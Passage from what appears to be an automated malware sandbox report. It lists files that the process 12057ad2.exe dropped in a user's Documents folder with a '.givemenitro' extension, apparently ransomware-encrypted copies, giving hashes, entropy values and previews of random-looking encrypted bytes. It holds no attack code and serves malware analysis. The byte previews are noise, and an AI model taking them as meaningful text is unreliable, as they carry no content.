                                              Preview:...o ..j)./PP*..v.@.7./&Z..'U.8.GyN?.'..>*%.L{#..g5...$.v.!-....s...j.....F(<Uq.Q3n0\48.n%[b......"'.g.E4.....G....r..H.d.....-...........L...p..4n.A2$.<B.....'...WG......F..A...{...O.E.ST&^I.i...k.53IFV..8l..}..$.. ?..?...YShh..aq/.........N...e.!..{<BM2.5c."N]P0.H;3@..........>8..0.;JUoI..........@%m.=A*./E.zi."X....#.|........!.<'..3....e8.J...f.?'h.-.6.1vj}. .}...6..zW..8.........h.6:..p=A..&,m...........N..........X.GK>.v5.+....k_H.>..f8.......j....T.Y....!...`C...;$.....*..TzK.]...i..hv.:.{1..1..>....V..2.m6..='...qS..P6. .....1...^..8.mg....y8..(.h......b....^j...$zt.<@q..2'.C9@TE.H3...Y..u].i\.k..._X ....l...i...Yb.*...h..V..]....Z(&[.....,.WW...dM..}.1.k.)h%W....o..9.?Y4.L@j..!\.u.C.....gt...?...4q*~.....:a..._....J3.UW. ...^.%q<}\l&.uZ...QS....\b...Z......!.7^Veq.[...1.a.....3....x..M...i.....W. .ia_.~..Db...qJ...V....[..8e...;...x.F..j._ ...D8u.)._...0...#......De.n.....M.G..`9............GdJy .|%m..pBy....x......Wq.^#...I........

                                              C:\Users\user\Documents\IZMFBFKMEB.mp3.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.811943167755934
                                              Encrypted:false
                                              SSDEEP:24:sUhJ54AWrLmfYjoZSeRTnhA9zx+elPbhozXsKWkr3zm7rux:sY4AWmQjo9To1TKgE3j
                                              MD5:0F0BD16E3190E8403374E900770E553C
                                              SHA1:D8CD3D5C8D34E183C75AB4A793803ABC89D27346
                                              SHA-256:4325646B0FFF88AA5C31DFA545F0306025553DBFB8C113FB5B3F039B5A846151
                                              SHA-512:4E5CF883C257DE2636F83E061B5A904AEFEC3B1AF05B29F565469EBDFB588FCA8D6416C4AADA5F4B931B68C8E43017CC622C52D0FE3AB7E3B258C0067ACB01F2
                                              Malicious:false
                                              Preview:j..m..(OM8....r..,.*...y..4\..L..L....9_2.fu...mYt..:./Ar.6u"...\I".AL.........e.....}Br.k:)......V...<T.......l..|.XX..._.......k^..`...-...HD..WT.LC.4..v!.....R.).d.9.-t].\2...,m.(0...E..$m...y]`..e...........o..I(....H.b..,.BB...=.....#..J......j^{L..z..!`.gS.O:.......K.z.....e......)..W..q.$%..&...x!J."Xp.r....g.2...\.A..#.ZO.....6.VDa.U.x.P..X...F....i..M.......V....O...j..rN.^.z..n...0M..;.3d%_.........o....d+...HCk.....Z.n$R.;90.f[8....\...9......,..P..c..H(4}...=..;.^.....<..Qr[.J....b}...S..3.a.........m.q-.?..x.......p>=....##.\.aJ...M}......`..H..bu.2...v.Q..R.x%..JS.(...kz8..DpH.......J.<..J..0.q.$.RF._......3..;u5r..`y.-...j....,.5.....5*...2.+R.0n~....P<...I.T*B.3.3.y......9.. ...N.7Z.#..R..9.l.,7.A.=;.gP.. ......wF.)...".u...5..Ig;Dw.I.j3X......Q..........)..m..$.t.|.....|?.A-_..7.#.....r.d....xqY...q+...G.M.:'.....]Cv"#...{.Q....8...4..00......w.m..{Py.ZJ...x.m.l..n....l.O..y...r..k.....:.HQas.....xDA.Dvfq...Qb......\3s

                                              C:\Users\user\Documents\JDDHMPCDUJ.docx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.790896206385027
                                              Encrypted:false
                                              SSDEEP:24:xK8ip2w7OKX7NNHO+wCPGlgm/oxMMu/pBWa:xK8kJ7NR7xGlSqLV
                                              MD5:22223D5AA4D1B199FAC2A1A017E8950B
                                              SHA1:8807D1C453DCD486D3F01A3C292FAD953B104A12
                                              SHA-256:0E21C4D44669728CFD75D30D6AD0B89443083638617C25C7CF4544E82A238411
                                              SHA-512:5B28B520E7B937EDFCA1B6466AC2B06A66BB8B642082B7742DCA2FAC5991FDCE684BD28660378986D219F0EE3B9A0A189875F42A238BA77F995D9942FEB08BD5
                                              Malicious:false
                                              Preview:.',iZt_.<.u.$.(..H_-WV..V...taJ........2|bKW....xm.[.........*fG....WG..l../.3.l......V._k8..>2.B..n. e.....d.dh..pY....r......-.A..._....7..b..>ut..._.......a.....s@n....Li.d..... .[...LV.....I....-....M}...VBD..7.U.hlh...G...fT....WcB.*.*R.........4 ...H.C..4) .Q.........[.8....o.L.."....oj. .W#...i...9.....E..Q..Y@f)77.(<L..,.&....K..".xB..#-^..b....,&J....&~K.,...FL.L0}....j.../x..QJ0.Io._.-.GGJ...-[t.Y...........2.......n$...l .P.U.D.U......D.D$..'....x.JH....k.fu......l..7.m...#.@H..ta+...t..,....7>..Y.{.. .l...<..}.Dh&....pd.E.....(.e........n.L.%)..-.T.i.E....~..q..P>..{..J.4..I9..$@.s_.;.(...*.(L|..IH..S...H<?...}.3......u./......3.....a]....OTw..XX......dW.."..~.f...../1O[laWm.....v.,.b{<T.]...{Z..M...E.HN.*-........t......Dl.b....".E.CdL+.F]1.pF.....tc....c..w...v..]...L.e.4{..`........Y........s..`.....I.K!g.?..I.3q...Sk..Z2l.i.,c....< ...&.`;.i....W..K.APNh.-H.O.Z....Gp...Y-lN_I. a......=QD...t.....m@.3:.Tw.vOWT....

                                              C:\Users\user\Documents\JDDHMPCDUJ\CZQKSDDMWR.mp3.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.827087136679168
                                              Encrypted:false
                                              SSDEEP:24:eCv9Fs9bR1bp86aev7JrhynZU9X0r3x5iVYybTePhQ8ATd:Nort8A7JrAZUX095kbTeZQRTd
                                              MD5:BFFDBC478BDC91866E76077415A01ACB
                                              SHA1:AB543309C8DEC02CA84711531869BC2C2D84F013
                                              SHA-256:8F4D03BAF1151C45761C3E54481E1F3E207634E1D0F7DF1B1AC37939681499F5
                                              SHA-512:BE03433F1651322C6AF2F29A10FC85F6FCED33DF13576A94EBF4CE7A5CADA6E71700959A18B2BD14725E1A274B9BE9D0B596D8BB4E9DA432700A414D6421B9F9
                                              Malicious:false
                                              Preview:*5.......!9.D..y.`9.....Ts.#n-..m:3K'.%4..x-w..p..g.C....f}...uC.V#.U.._...3..i.Z..a.......f..9W.SW...l.{..A(iF..N.R.q......|.Y....7T....m...Xo..."....CO.y..^t{P~......rHd0vl.......+..d..CP....v..^..0).:46...:....[x}...;x..z`l......Z.......7sN..L...$t9.....p.......,..h...Q.x...t...-.U2;5.z.%xN}..*.t.|....@-!....i.Z!.h%....Zc.0..*_...w.t.....\.U9..[....bA.(/.<=._....v.'....#+[X.s.@j8..:..R...4`D0k..+..z.xRJ..@.nq....F6....*...nP..b:....;..."1..5....<...z. ].....z(u......L..H.8..m...3".~...,o.@we..~R,<..FEi.8.I...M.....0...]....w...]7.../.`..i...T./.....j. ..j_)[.f.9p. l.PE..nTF81.G..U.n..R.&e....d..cBtaQ.<d.K.0...)o'A. S..V..."/I.(..n...).l....w..M{W....n.H%\.W`....1I*..5^W?p...;^.i.t.B|.....).....2;.A#.`...........t..#..X......{...C.|V...Z.$../.:.lP.....e0_V~...p.V..].XM..R.._..5_...sX.k.....M.%......!.s.C...(T8tPH...]_..Z..J..ePv..%dC.7O....4..a!5.#.g41..-..;..>.....8.8+I..R.tS..U...9..$<`.}?U+NW......]...C.*Ou...*...@1.VD.3y.

                                              C:\Users\user\Documents\JDDHMPCDUJ\JDDHMPCDUJ.docx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.839681870346812
                                              Encrypted:false
                                              SSDEEP:24:BzCoRmn16a85p99ArYekWwHa7Xh53xyDfgLcd:BRWEtUrZweE6cd
                                              MD5:28397FD99DED39056756CD30CF67B3F9
                                              SHA1:96EAA61AA899249CA3C693B58A3480A1331BA34D
                                              SHA-256:540FBB336C0D5B32F738C0E6F900107751C961503C821C014B0198A38C39B74A
                                              SHA-512:326AFB6085DFCF6812CEEB2AF2AF30B5DE56A9B8C049E94192013C938CB2799BF9D7E7A9AA77FF2BF91DAF615B9616ECD8D2425A259BF6D621CD6D8FDCAA566F
                                              Malicious:false
                                              Preview:.....Y.^c.):.......>..H.......@N2...05K..D.......J.F..Iv..V..\."..>...0<.......-C.2K.O..%iJ....'+.|.W......j..^>..+m.0k.....VB.)....7o..K'2...s.`...w.m{.6.D..V]....kO.-....Ox.t .`..4.....JiA...Z.8i<kP.vw.>\*...............}..U.h.b.j.....L..,.!9r.z..R...c...LH.D...{K.s.2U.v..%=.n...|*...g.vCI>$.Ree.i...|....v.L4.W'+.........Uw.g}.k..Q...g.&..`...b7.)y..NuE..)..4.H..o..zi..;d/.WA.../xx...*..?.34..`}...!.L.A.*.z...E.~......D~..........?3....v~u~...H.mt.R..q.....\.n&yUx.Cb:...&t. .>...y(7..+....aC....R+...9!.vy.3>.C..*=P.p..7k1.].]..qQRuS..]..!z./..N$;...Q..a.8I..J....@.......Xe.F.?.c#|."....`.!.W.[..?...b...y.....G..).(.E;H.v."..b..`c....@....ds.6..xjV..B.z6.5.?.Z.Xm:Am.....EQ....%$......\..i..4.i.0_...\=.....WT....^...wf%.S|.....w..^F...V..R9.9.XOC'l].-yC...._!.S.:...e.|....VJW9...J..@.e.....6.(c.>zh2*...8a.x....q.#=.`akg.]~.VG..VW7..u..+..T]....&.?.w._..K..W..j....@.!9PS..$..W#....3..%....y.....7.J.....?...~j#X...P..Z......<..1&.

                                              C:\Users\user\Documents\JDDHMPCDUJ\NWCXBPIUYI.png.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:"compact bitmap" format (Poskanzer)
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.820207185160235
                                              Encrypted:false
                                              SSDEEP:24:pOc1kaN05hxCsWOqWw3wiiKsWsn/3qUgbZ+hce:pbWu3h339iKzs/3qID
                                              MD5:B90C4FC371AA877363C388FF3922BD36
                                              SHA1:0FA3C68FF8E51556C05DF38286EFC7C39063A080
                                              SHA-256:7C8B4B9582B763F3EBC58F2F97EAB191EA90D4AE8F5D8FC10050229315B1D2FC
                                              SHA-512:6978FADFB8848530CA50EC3F063AAD1DB17D7AF574285881B7518079A30542BDE62183C8BF2436ED7ECE4CBCFB05060D9E2D3ABBF0FC2EA64FE8BDF90E422B16
                                              Malicious:false
                                              Preview:.*O..y ..*..p2VQ..3.GC.M...~^.........J..P.,........)h...d.UD.V.]..4...n.9N.e...B4...=rY..%UlG`=.....!...v.z6}.#.dk.....E....#.e.%^.31.....+.;,K..U..`...*..L..dE.....v.t...;k...e...u.v...[NZ.?T.G.-..b.....%.30.b..b:..B..Z............{G....'....~}...I....:p..gj..u...5)........'_...BK.DlH..n..U.7..1..*.U..<...=.....>.HQ......u.FA.B..#>.H.....q$..{...R.X9..;..Xw,....i,n#5Z..\....u....C.%.%.Io...&.`...k.....G...r.o.......[..2.Imh.\9.i.k..2..2....\q.S.......G.y..5.T...A.....b.....C6.;eS..~.a.P.......7.... N....tYT,....Mqz]|d.[b.. ...!.^.\^"B.*.v51M.....;b...&;..j.C.5.C.M.G.`J.(......g./..<...W.@Y).....M...U4.kL.A..v<.]...?.V.a..o.!K....,z...)..v=.z.x.....G.$n ......[....E....k.....q1.A..btA.....jH4q..i.v....V.Ok].~.X.r.[....A3..~....j\+4.D.*...#NY1F0....c.....G.tx...'...Y....U..C.#I...5..=U.No...m.i=_..3........o...*u..g.C.uE"..IF......ze*s%6....q.f,5..O.S..z..]...Q1.m./...7$...i...VW...1.=..>w _.t.....6..S..z,9....T..7...Q..d.v.q.H.tQ(.{...U2...Tw.%

                                              C:\Users\user\Documents\JDDHMPCDUJ\NYMMPCEIMA.pdf.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.803842435284358
                                              Encrypted:false
                                              SSDEEP:24:v6rrNZXGCiw4bcOpwPW4KazxJVvKz6JDHjf54/4:v6rvew4bjKPWNOVvpJDK4
                                              MD5:D7B0893ACD1052167D034C3DD2237CF0
                                              SHA1:6C5FBAF065424B42B4008E581B4C5B5A8615D6A5
                                              SHA-256:28C827CB989CA4DDF0CA5B87004F891B0209537E45B3B0060E3B53144A206188
                                              SHA-512:4CF683421E89D373B1D7204149B77D20937D5FBDCF2B90D75C97E5EB1C003EA0E4C6AADEA1D4283D25593E9E48546E262AD71289A0B85E62BF617542D7E0B0C2
                                              Malicious:false
                                              Preview:....M....@.....ME..$...?.d.m.5\r.KE7W...#0..B.......c.Z..E.lJ.Z........*BNCG.WR.X..sIT.y.m8$.$.6.-(.eKe..5.[...^..G....c.8.zWTU.%!E...Z.y..Z8../.h.I\...Az....AVj..G.e_......n...a..l..s...]vZ<......Dkv.`m6.c.....S..h..3.Tn...5....x)/%....F. ..~....G.&...(d.<.....P.@`zJ..f.%...S....d..W...K.......U.~.L..km..-..(j.M...'.F..1'w.m...ZC?B.Q....1..=SzA...T.-..sN.k.F.s...U_..3.;.R..v8..E&.H..l....p....]\....h......EU.....b......^f\h.:.jy..K]7.8N.....23..IZzF......,..Gp.^.`Zv.....x.<.....:..O.mN.pux...}...q.~U_...D.P........Y...C.k....I...Hz.@o..F..}..n.%].\a..(p......AJ...$I.J..\.a..l3.ru:.....l..".e.n..lw..d:'.u.-..6.\.O..y;..o......j.h+.U....bsj.9....4...R...a....MV....R..;...J............U...l...O..7.E....N.o._j.1{.\.X...0R..].;.....f.v.e.bX........DbW...{X.m.. ....fS.J........U"b1..U+.0.S.l..2.U..h}.X....a&....Ex.`.1.)q.....w_.2.d....N.v..9[..|7.3W!<.....v..86..\.|./.`.d.pj....8._....?.s.u..U/..q..b.{...Tg....AS.C..E..^.8.i .c.RI .;{.d.a

                                              C:\Users\user\Documents\JDDHMPCDUJ\QCOILOQIKC.xlsx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.836446860062895
                                              Encrypted:false
                                              SSDEEP:24:V11GJBRO2xhjZZQ5Zr8foibO+q/PFPQHEZ7GicprRNBfqsubkrAzgvgb1:V11UR3x3ZQ50SJlYHEZyhpVffqJDEv+1
                                              MD5:9E3CFE9C7FC0D961909A29F401301E1D
                                              SHA1:2E600752703FD947C7C1A48E6E9345568B5F2792
                                              SHA-256:B5192020037788FCB0B557E9DFB7A6FE8FB4B5F149ED9E2896B6C9008B6E6967
                                              SHA-512:E897AA9B783B789291AEC44892F6035A0B4DD1B77C29C16944F01A35FA4E0740B08F83B0FBA29651A737A293E37F162323C1654E25815B87517FFA00A84C93D6
                                              Malicious:false
                                              Preview:E.Q41......"..(eQ.!n}.?..F2.0.T...x....c..-..}.-G....>.O@.C,V.i....8...>..z......Q.......].P8.q..P^..s.LXg...@.F.H........P../p..QH..6...?#......M...W....@...}...`...~Nq... ...1..l.q3.E..c;Y.*.>r..x}....#....8i\@.!.3....xud.Cf.|.Q.H;=.]S.!....F......T...a.......0.Rcp...N|..Bk...#.gs..O:....>@x...3?*..`..;.1o..$6......y.y...<.r....=..av.m.n..4..Cqd.uN9k...5...n.nE....A...P..........H.h..r......z.......0^.i.f.p&n....'i5..#Q....^.f..+..J.O".\g2I-../....B...Z.........S.8..0.....3:.../[\L...C..?2.0..,n..k<5S.*..S.r.o.+E}...[f.N.....hKw.0b.%.s.Y. ..QS.hF.Ee%......`L...~.......%.n.|}k..CG5p.Z..a...t.r9...U.....V).._...C .....=X..X..#.d...,.|Q.v.5.-..`..).07.)c.G~.VY.h....!".H.Dle.....Z.S....|.J...P...N..xi.;...zF..|......;..:...............J..,E..8H...*.&i*......G.....I.Q..k..`....y..YI. z...q.=......DEH.ac..V.r..s[{......0..h..S.Tx......<e....j.X................%.c...lj.eN.._$.e....RN.c.$....O0L......UM.nL...V|......G!4.NI86.lU.M.

                                              C:\Users\user\Documents\JDDHMPCDUJ\ZIPXYXWIOY.jpg.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.809837878028223
                                              Encrypted:false
                                              SSDEEP:24:L7ArOdPSkaq5J4uHx0tzH4xidC2jb9GtOXI63PmRM7NwETR52pp:/A0NaSRRoH82jb9Qs5uRMuETRwp
                                              MD5:49CAF3172739F7813DDF4EAC98FF81AB
                                              SHA1:152D2C70FBDB34BC6ACE5C220C5B2EC83653C831
                                              SHA-256:72765AF7170DF707C7CCC48E0C3F79FBCFCF8D4EF5B3734BF9C1980E69A715E7
                                              SHA-512:9CD0AA75C7C5271E419CC5CB41EBDACAA0D6626A17CBDFA6C1387DD6CC15673C4E45B900BCA43E4C41C4B5F63C62E717F2D59F31BBFC4D7535B482FD50C5718C
                                              Malicious:false
                                              Preview:un.Q..(oW=..:......;.J>...`|HC.D...4... ..s....}.x*.d..c#.R.\6B*.?.0...Q..[.w.`$2#......!.).....(...h...U ....}{..:.#z.t.2G..mu)..%...|.8.I...Rt...P;p..'.U....0w..f...`.x(@.....l......?1.UL7......*.X?.....:.-.(.....sUn51.......c.h?(..y.^.b..M.....jM.2]..Q.....r......{...._.w..a..o...7.{l.C.0...`..2..|.h.G..c.\.D..*........&.N...\.....,B..h*G...S<"Q.....H...=.[..Y.$.d....~.2.~?....,..P....`...Q...g.W.m..|......h..'=.Lk..o'D.KBx..A.P.H....v..T.L8lqQBl..}...OH..D......R....k+k.x...,......";...1..Sh...3.I8w.n..<...........bg%.ND..Io.K....8...U ....).d...N..#..c.jN..n.l.../..6r...!.=>..r.M.......K...9.=5a.k.......Jj.y.4..X..G?xN..*...[PC...jY3..Aa.E.2.pq..V........g.....N...|..-.B....OAI..vL.z@\...K1y....&.O.k...g..W.:K..l.^A..`0...7...|U...^M..{..P'<L.S!.d.:..B......zZ.X.......r..........c!..c..].G.o^.M]05...S.W.p.......o...<+&W..j.O.^4]...i.8x.l.?...A.'...sw...+P....a.q5w._.'2dt.bn.s1E*.hk..C...I.!y.&%.......9.=B.Iq..m.^...8I......Z......%..

                                              C:\Users\user\Documents\LFOPODGVOH.pdf.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.824068728703923
                                              Encrypted:false
                                              SSDEEP:24:VSnJACeirUeZsxEUOp8/dfY9fYBlDnbw5crJXUwvsOCt1lvO:mP8EU5lfF3I5gJXUwvsO41lvO
                                              MD5:B708B9291311F0F9E86DCDAFA14F0BAD
                                              SHA1:0020ED0230230C9ECB4D87D95032460AC3E812DB
                                              SHA-256:CBEC81818F21B420BFE10F5C5756FA015EA0C2483199EDB755E4ED353FFE1F35
                                              SHA-512:7D6D3998770F4CB5FCE2824F5D024CD0F754A861136F596065B31BED7F145346C2C4E31A6149C62F7E2BB122D3080B357372A98A9EE017DA9397E4A4717F3B89
                                              Malicious:false
                                              Preview:.fT.K..Q5...Tm......0.h.o..i..>x....P._r.-....X^...%...F.`A.Q.|..V....t..o.6...xf.Z..H...CC..4.z-...jV.N...e&..44b.....dy..Dm.P\.....<.(..\...(&..u.._..}.bin.CH...#x..5. .L...#....4.....mH:$..|....I..;.).I..j..M}.0.....S....o..~\w#=D....s.M..G...y...,Y..!T.CF........D.&....erqj.....;..A...|.l..kd0iN...h..*-.....'p.R].(B...i.v9...Qxs.{..w\.G..G"...-u}......o.[.W..8Y..K.n....3{1u..T.W...f..;._Y;3....j....1..f...F.w:..S....'..^{.%......R..h..4.kZR..z...X.}.Z...fM*&.......".....J.%VJ.~...w..l.g....(A......b..Zs....U.M.m.z#.yb.;.&.1#;..... ...........b.vf...!G6.X..#......am.C|D)e.1..}?.(N.....z.<._n.....B.M.Jq........|..1......oH;.&H..y5.,...&..k...^ns......%XF...j..W`bH9v...&.u....Sv.1......=......G6^..O...kl.......U!.0m^9q..+.Y:...}.T^...Oeml- ...I.....)...?S.{...d.M.M..?8..hJ..W..V...s.I.N.15l.....9s.1f!...M_[`..\q..?..W...\.l...b...,'.kj..T`..j.!.w.Cj..a..u......r...,.....Y0..9.........3.#..../...x..!i..k....Ec.3.m.[u......".s c....|.

                                              C:\Users\user\Documents\LIJDSFKJZG.png.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.838973448769015
                                              Encrypted:false
                                              SSDEEP:24:7mwas6obntlqtOgijppgIZrb4Yq6PaeqMhoENu643MV:7VlztlqtkjlEephoENJV
                                              MD5:6E82378A348026E7B21248DFF75301DD
                                              SHA1:23DFBDC4A15B8D08D325C7B0C95FE48C709E2C64
                                              SHA-256:07EE23CB2485033F379858E7AEAA95BBB36A32C3308550C12201BAA6FAFA5456
                                              SHA-512:5A3A3383D1AED4F348873A0BE900526073E5530ACD22F3BDC506131BAA8A123CBF2D6267BD75427FCD044FF5E4A2C2D453FDCCEBD898871174C7CBFAB810241D
                                              Malicious:false
                                              Preview:1.`d%.@8...l.o.a.:.a.pd...y../+......f4.D..(G.""u.!.^....\Z..=...=Dc.a7....j..ADg6C............l @}..[..H~..86Cr.gJ...5UL.)}V...U.7..j..0..V=.g..wbG.P....s._..Q>.....8XA.Wm..)...j....=.0......N..w..4.d.L...{..7........O...11.BF...F.....p....?Y.?lJ.M..L.0........u...H......R...S..f.*..).M.20+Vb.d.........\.....+R...&^V.6..p..!x.X.f.>..z...9.n.B...zs\#e..:...T.....D.:r.7...z...O...cZ:...a.........g.Wre_&...v.T.....M.Z}.....l..}$...P.e...Dg.......q..3...+.\+...]G.#.L.>-.HG9.r.....n.$o:...H+...9S..5..I....c^......`......H=I...,.*..H,..1$ mn#h7...u.g..I1...q.,<..s.....~..v...W...l,!.B..|......jU.......jt4|'.aO.Gw......Ks..../wct...>..DimvSo@..._..%..lv...}.7 d...se.p.;.....lt.j'vS..4.q..}.x/.g.*`..E.7t.2..mD...<"......|,.......".O..7..Gs2O..F.<.P.+0...a.u].GAq.5..^x ..s.....2wc.G..W.u.Q.2..C..r>:.H..qt..d....6~..L...}..x.xf.B.m#..K. .f.....r..H....s\0[K.R..S.R`LQ.....[.Sy.|..Kc.4.~... vi[.Mh....KW.K..._.W.....i...X..).....!`...1......q.o.

                                              C:\Users\user\Documents\NWCXBPIUYI.png.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.792384945091977
                                              Encrypted:false
                                              SSDEEP:24:ngjMZc6O9CpuFY7fVrWAksrVNXGfT8d9MeX1Z66Yr8CJ8o7EaFRvo:gjIc6OCpKYjBbrbGKMeXrrQ7c
                                              MD5:7F0FD8931577AF40FEE2F501369BAFB3
                                              SHA1:404D82F1CAB616DA538C8D33E84CEF2E45A439F3
                                              SHA-256:612B29A6F3462D80406ED31D3B1F11EE378FA01EC9DB25913A6203E63761B2C0
                                              SHA-512:BEDF78D2C3D389B92E8220ABDA771991F2344876EC2603620CDA828038E5B5250D1B67450986F3543598B81A446214F0022B816467AB4D54B0E240939C8CE3E7
                                              Malicious:false
                                              Preview:.^.5...F...g....`5...T.q....@^x./JvB.V....bLM.B+.i..U7.|k.a8Z\s.....-..Y).ei.f..2...e....Sa....b.D...K..fK...x..A.5.........1k.......Vk...%..v..`GU.].....EX..Pg.i..e.=.Z.P..Rs&.#f.2l3j... a........t.sW..3.>..`>.`...q..+.3nU..M+......^.0k......\.7H.........)s.....%V....t..3......!.......7V..&..)...XT..5".J.;Y.....<0........O.#p.Te$].U.}mb4..[.....E.....C......i.....Kz...,.S...<.sOK4..=..:.%.;8BeD5................n..wm.Q+..u.......+J..~e..w..&...3.....h.'E.)...*..gK50.....^.tgz.......=2...U..-.u..M.B...v.(..B.g.%.....h>..J...._c..'..;.......]T..M+..i.M.>l..U.X.ToapR8.Z....>.{<?....pC..:....~.S1G.T.. ...Z....j~.p......7...G+...m.........r..d@.....PT...N..Z.V..C...h...7.u.e.u.....7.`+A.n.f...|...k...X..t..}O....7.5.+,XV.._@.%....NMC%G.k...._..K..@.....c...\.8.DG..G.cW...,Oe..ip....'..vP.3...R..Z...y.j..c..sO......94^c..VpB....Q..|.E.V.+HGv.R......I.....&....4..#*<.w..!A..T.....x[C.....V...P..U.D.....6.V....X&Qi#....x..i3*V.

                                              C:\Users\user\Documents\NYMMPCEIMA.docx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.84812806328834
                                              Encrypted:false
                                              SSDEEP:24:ywaDJXcYh4v3uvWKxCxFS8Jc/hAigRbQKCs4fySsxPtv0J9sPLVTN7Ju:haDJvefCWnFSzhqRbms4fq/vjHQ
                                              MD5:7154C94F9C0403AC1220F9C3F906575C
                                              SHA1:746F9AC054BC96007EC8BCEDFD71B97577F54DAE
                                              SHA-256:94060255AB7DBDB9B193E5B7AFFF0B774A83ED76B21D4840F94CDE412FF72A65
                                              SHA-512:0D26CE1E210D96EC7AB5BD72F833A4A95EBF0F7A07771D788F20D1F0E816C078124BB20D3C5F8A813D57ED4AAC562FBB70EFAF1F2BD9A5E52B89DBB3B2604658
                                              Malicious:false
                                              Preview:../Q...,..k7. .Nj.....D/O.n...p.72.......~..rI..s.=%q........%j......l!...}.q`. ..K.W......nK...Y.....o.Z.D.3.....]'...C.........N.\We.......8.W..pm....^....L.R..o..\.4....J...).s.v.._0d^.=............F...B.....?3.F.H.=..g...Oww.Y..J..6P......@J..+.I.Q.....q..0.*1.=...c..6o......Nx]J.6.T.......<d...;..%..zV.r.[.R(.Evg...2.*w..,..4`.EB..e$..CVQy.U.#.I.._.+.(..>9Z!.I....Ma:"..........2n.....['......}k....|..r.x...W{c......S...L...\Z...S..T[..._U..Ih..DL..BBc....%C.8%..`.:e...I.k..A.*..o~.4......X.I.- .f)..-*K....I...G..^. .y.W)...(?Uq8....;.i4.3..B.!c.<*..(.Uj.]c.[.n.Q..f.......e..K.uq..d.f..T}...p._..-...CC...g.c5.;.>.5...6..tH6...$7...|#............@i..z...8.r.u3>...E.k.cs.P..O7......v.tc........uf.Q*..f.8....!'.2b..%..'.q....wVb...r.Y.y.:.$l...nP.-p...!....;7.5.........b'..n.@S....5.<L...N.ox.c;...'m.4G.A&..T'9....Z...|..V.....K.*..+*......2}..F..V=....$.-2..Zd..d......7.Kq.5.jo..lF.p..G+......<:...{...........).}.1f.M.^...p*c.6.U....U'.d..

                                              C:\Users\user\Documents\NYMMPCEIMA.pdf.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.845831953028946
                                              Encrypted:false
                                              SSDEEP:24:a+hdMHtXWG/S0XuJLtsYh6HcjjPAhqXDZ3rgYtvYV3bAHAe:aXX7/1+JB68jHpXtvEbAHAe
                                              MD5:4695EA8DFF14F798660DF388D3E3756F
                                              SHA1:5C2DD3529B451B0C13588A6DF05F3D1F62A87210
                                              SHA-256:C10F44E07972DA68533279CCA83FE7316ACE486D3126E7B5C9F4D9FB2DA13CA6
                                              SHA-512:A6E71963AD579970F10CD4C7B1D8F168FAE27A646719602DD234B7DEDDF44F68CB491C8DFB51FA2078E29AAD2A0FFBAE9DE428854EFEB622139B09131CEA60F3
                                              Malicious:false
                                              Preview:..3jJ.....0.)..9.p....3.. ......m.{....._.9.;...x.*)OL..:.9.D...a../.l..u.C..fQ3},......>.TV2.ta..:...A.+7..... .W..>...F.#. Z......Uj....l.......t.44{..'.*. ..iT(}F.I.......~.z..G.m.~...:..dZ4'o ....?...T.{K..%../(=.-.'[.E,..@.-1..Y!.&.|A...^i.......`.e..n..8...g.ww....?..SS."...PiQ}h.VIsz.&G......t.S..eM]=TX.u..`F.fd..dB.`(.6.ND..+........+..(.5.H..X..E.A]..|~.i.7..@.5T.....h....=....b..Oe5s.=oO+...MD.}.q-Z..U..%....]..`.1[..........m.7....G.;...0.I...Zr8.if....~"...d.0K...b..No..../?^.l..M.........;.%.. ?......R.h.p.......$~.....9....y.J4. z..e.E.eX.GTS"r.s....~.]...S'8.U.....yK..."M3.,.~.PP...ID....Rq...7.NU.z..V......Y...>.3.....T.j..cK.</.._J~.m.".KE...D6...822.$.J1.k.K.I....r..w...(..Md.}M.v.(........e..5p`Uk.G.m.o.k#.g.I.N..1...^*...I:...u.jk.t..}~..K.....<.a.[...[...../KMB.C0ET....{w...9.2v0.O.Q]......A...L.V.O.).....X.$. ..r.7.T..+.e..s.$.'W.........N.}..5....'.3..3....'U..@..Fo....^.r*...A.T>...v]b/.f:....

                                              C:\Users\user\Documents\NYMMPCEIMA\AQRFEVRTGL.jpg.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.781649641657415
                                              Encrypted:false
                                              SSDEEP:24:SfJb+lVQ1nwo+ToiMnrZM4bk1q5MtuLlVFLP50wOLN:8Jbku1L+ToDnNbk45MtuRVFrcN
                                              MD5:9761070CD693FFD67BEFF31F0BA93A69
